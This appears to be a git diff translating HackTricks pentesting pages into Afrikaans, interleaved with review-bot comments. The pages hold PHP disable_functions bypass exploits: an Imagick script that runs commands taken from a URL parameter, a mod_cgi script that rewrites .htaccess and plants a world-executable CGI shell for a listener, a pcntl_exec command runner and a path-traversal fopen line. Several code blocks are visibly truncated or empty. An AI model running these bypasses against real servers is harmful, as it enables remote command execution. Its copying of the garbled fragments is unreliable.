+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! +Ander maniere om HackTricks te ondersteun: +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md index d2baf5b2e..385fa32a5 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md @@ -1,24 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# Imagick <= 3.3.0 PHP >= 5.4 Exploit -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) - +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php # Exploit Title: PHP Imagick disable_functions Bypass # Date: 2016-05-04 @@ -47,42 +44,37 @@ From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog echo "Disable functions: " . ini_get("disable_functions") . "\n"; $command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id'; echo "Run command: $command\n====================\n"; - + $data_file = tempnam('/tmp', 'img'); $imagick_file = tempnam('/tmp', 'img'); - + $exploit = <<$data_file")' pop graphic-context EOF; - + file_put_contents("$imagick_file", $exploit); $thumb = new Imagick(); $thumb->readImage("$imagick_file"); $thumb->writeImage(tempnam('/tmp', 'img')); $thumb->clear(); $thumb->destroy(); - + echo file_get_contents($data_file); ?> ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md index c5cbfdba1..bc085cb7b 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md @@ -1,24 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# mod\_cgi -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) - +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php \n"; +echo "$text: " . ($condition ? $yes : $no) . "
\n"; } if (!isset($_GET['checked'])) { - @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed - header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked +@file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed +header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked } else { - $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled? - $writable = is_writable('.'); //current dir writable? - $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled? - checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No"); - checkEnabled("Is writable",$writable,"Yes","No"); - checkEnabled("htaccess working",$htaccess,"Yes","No"); - if(!($modcgi && $writable && $htaccess)) - { - echo "Error. All of the above must be true for the script to work!"; //abort if not - } - else - { - checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know. - checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension - checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file - checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx - echo "Executing the script now. Check your listener "; //call the script - } +$modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled? +$writable = is_writable('.'); //current dir writable? +$htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled? 
+checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No"); +checkEnabled("Is writable",$writable,"Yes","No"); +checkEnabled("htaccess working",$htaccess,"Yes","No"); +if(!($modcgi && $writable && $htaccess)) +{ +echo "Error. All of the above must be true for the script to work!"; //abort if not +} +else +{ +checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know. +checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension +checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file +checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx +echo "Executing the script now. Check your listener "; //call the script +} } ?> ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md index 8495863f0..2d3b7c6ba 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md @@ -1,62 +1,54 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# PHP 4 >= 4.2.0, PHP 5 pcntl\_exec -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) - +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php out"; - pcntl_exec("/bin/bash", $cmd); - echo file_get_contents("out"); +$cmd = $cmd."&pkill -9 bash >out"; +pcntl_exec("/bin/bash", $cmd); +echo file_get_contents("out"); } else { - echo '不支持pcntl扩展'; +echo '不支持pcntl扩展'; } ?> ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
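Review bot: The translated `pcntl_exec` block in this hunk strips the leading indentation of the lines inside the `if`/`else` branches (`$cmd = $cmd."&pkill -9 bash >out";`, `pcntl_exec("/bin/bash", $cmd);`, `echo file_get_contents("out");` and the `echo '不支持pcntl扩展';` line) while the code itself is unchanged, and it leaves the Chinese message `'不支持pcntl扩展'` (meaning "pcntl extension not supported") untranslated inside that same block. A translation PR should not touch fenced code at all: restore the original indentation so the hunk only carries the prose changes, and if the string is to be localised, do it deliberately rather than as a side effect of re-indenting. Also, the first support bullet is worded one way in the header ("As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**") and another way in the footer ("As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**") of the same file, and the last bullet has "GitHub-opslagplekke" in the header but "github-opslagplekke" in the footer; the shared banner should read identically in both places.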
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md index 2d914126a..17091744f 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md @@ -1,42 +1,34 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# PHP 5.2 - FOpen Exploit -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) - +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");' ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
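Review bot: Apart from the banner, the only change in this hunk is the removal of the blank line between `Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/]` and the opening ```php fence; that is an unrelated formatting edit and should be dropped so the hunk is limited to translated prose. The command line `php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'` is correctly left untouched. One consistency point: the header renders the first banner line as "van nul tot held" and the footer as "vanaf nul tot held"; use the same wording in both.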
- - diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md index d31adb463..5b70b383c 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md @@ -1,24 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# PHP 5.2.3 - Win32std ext Protections Bypass -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) - +Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
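Review bot: The ```php fence that follows the `Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/]` line appears empty on both sides of this hunk, so the win32std PoC that the heading `# PHP 5.2.3 - Win32std ext Protections Bypass` refers to cannot be reviewed here; please confirm that the translated file still contains the code between the fences and that nothing starting with `<?php` was lost when the file was regenerated. As in the other files, the blank line before the fence is removed without reason, and the first support bullet is worded differently in the header ("As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** ...") and the footer ("As jy jou **maatskappy geadverteer wil sien in HackTricks** ..."); keep the banner text identical in both places.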
